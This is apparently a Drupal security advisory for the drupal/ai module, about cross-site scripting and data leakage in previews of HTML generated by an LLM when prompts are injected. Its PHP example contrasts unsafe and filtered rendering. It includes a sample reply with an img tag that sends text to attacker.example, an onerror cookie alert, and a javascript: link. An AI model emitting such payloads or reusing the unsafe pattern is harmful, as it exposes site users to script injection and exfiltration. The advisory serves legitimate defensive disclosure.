DRUPAL-CONTRIB-2026-054

Import Source
https://github.com/DrupalSecurityTeam/drupal-advisory-database/blob/main/advisories/ai/DRUPAL-CONTRIB-2026-054.json
JSON Data
https://api.osv.dev/v1/vulns/DRUPAL-CONTRIB-2026-054
Aliases
  • CVE-2026-13234
Published
2026-06-24T18:36:54Z
Modified
2026-06-24T19:15:04.330568065Z
Summary
[none]
Details

The AI module and several of its submodules (AI Automators, AI Translate, AI API Explorer, AI Content Suggestions) can use an LLM to generate HTML or Markdown and preview the result in the browser.

Under certain circumstances, rendering that HTML can lead to cross-site scripting (XSS), or can expose secret communications in the context of the LLM request.

This vulnerability is mitigated by the fact that an attacker must be able to inject text into the prompt in order to carry out an attack.
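
As an added illustration (not code from the drupal/ai module or the Drupal Security Team), the following shows the rendering pattern the advisory describes next to a hardened one, using Drupal core's Xss, Html and Markup utilities. The function names, the tag allowlist and the sample model reply are assumptions made for this example; the advisory does not say which code path in the module was affected.

```php
<?php
// Added example; not the drupal/ai module's code. Assumes Drupal 10/11 core.
// Function names, the allowlist and the sample reply are illustrative assumptions.

use Drupal\Component\Utility\Html;
use Drupal\Component\Utility\Xss;
use Drupal\Core\Render\Markup;

/**
 * Hypothetical allowlist for a generated-content preview. It deliberately
 * omits img, iframe, svg, style, script, form and object, so the preview can
 * neither run script nor make the browser fetch attacker-chosen URLs.
 */
const AI_PREVIEW_ALLOWED_TAGS = [
  'p', 'br', 'h2', 'h3', 'em', 'strong', 'ul', 'ol', 'li',
  'blockquote', 'code', 'pre', 'a',
];

/**
 * Vulnerable pattern: the model reply is wrapped in Markup::create(), which
 * marks it as already-safe HTML. The renderer therefore skips
 * Xss::filterAdmin(), and whatever the model was induced to emit (for example
 * by prompt-injected text in the content being summarised or translated) is
 * sent to the browser verbatim.
 */
function ai_preview_unsafe(string $llm_html): array {
  return ['#markup' => Markup::create($llm_html)];
}

/**
 * Hardened pattern: treat the model reply as untrusted input, exactly like a
 * comment from an anonymous user. Xss::filter() drops tags outside the
 * allowlist, strips on* and style attributes, and removes javascript: and
 * data: protocols from href/src values.
 */
function ai_preview_safe(string $llm_html): array {
  return ['#markup' => Xss::filter($llm_html, AI_PREVIEW_ALLOWED_TAGS)];
}

/**
 * When the preview should show the reply as text (for example raw Markdown
 * before conversion), escape it rather than filtering it.
 */
function ai_preview_as_text(string $llm_text): array {
  return [
    '#type' => 'html_tag',
    '#tag' => 'pre',
    '#value' => Html::escape($llm_text),
  ];
}

// Constructed sample of a reply that an injected prompt could produce. The
// img runs script via onerror and, if rendered, makes the browser request a
// third-party URL into which the model was told to place the text it was
// given (the "t=" value is a placeholder for that text).
$sample_reply = '<p>Summary of the article.</p>'
  . '<img src="https://attacker.example/collect?t=SUMMARY" onerror="alert(document.cookie)">'
  . '<a href="javascript:alert(1)">Read more</a>';

$unsafe = ai_preview_unsafe($sample_reply);  // img and javascript: link reach the browser
$safe = ai_preview_safe($sample_reply);      // img dropped, javascript: stripped from href
```

If the site already manages text formats, a `'#type' => 'processed_text'` element with a deliberately restricted format (no `img`, no `iframe`, no `full_html`) is the more idiomatic equivalent of `ai_preview_safe()`. For Markdown output, run the Markdown converter first and apply the filter to the resulting HTML, never to the Markdown source.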

References
Credits

Affected packages

Packagist:https://packages.drupal.org/8 / drupal/ai

Package

Name
drupal/ai
Purl
pkg:composer/drupal%2Fai

Affected ranges

Type: ECOSYSTEM
Introduced: 0 (unknown introduced version; all previous versions are affected)
Fixed: 1.2.17
Database specific:
{
    "constraint": "<1.2.17"
}

Type: ECOSYSTEM
Introduced: 1.3.0
Fixed: 1.3.8
Database specific:
{
    "constraint": ">=1.3.0 <1.3.8"
}

Type: ECOSYSTEM
Introduced: 1.4.0
Fixed: 1.4.3
Database specific:
{
    "constraint": ">=1.4.0 <1.4.3"
}

Database specific

source
"https://github.com/DrupalSecurityTeam/drupal-advisory-database/blob/main/advisories/ai/DRUPAL-CONTRIB-2026-054.json"
affected_versions
"<1.2.17 || >=1.3.0 <1.3.8 || >=1.4.0 <1.4.3"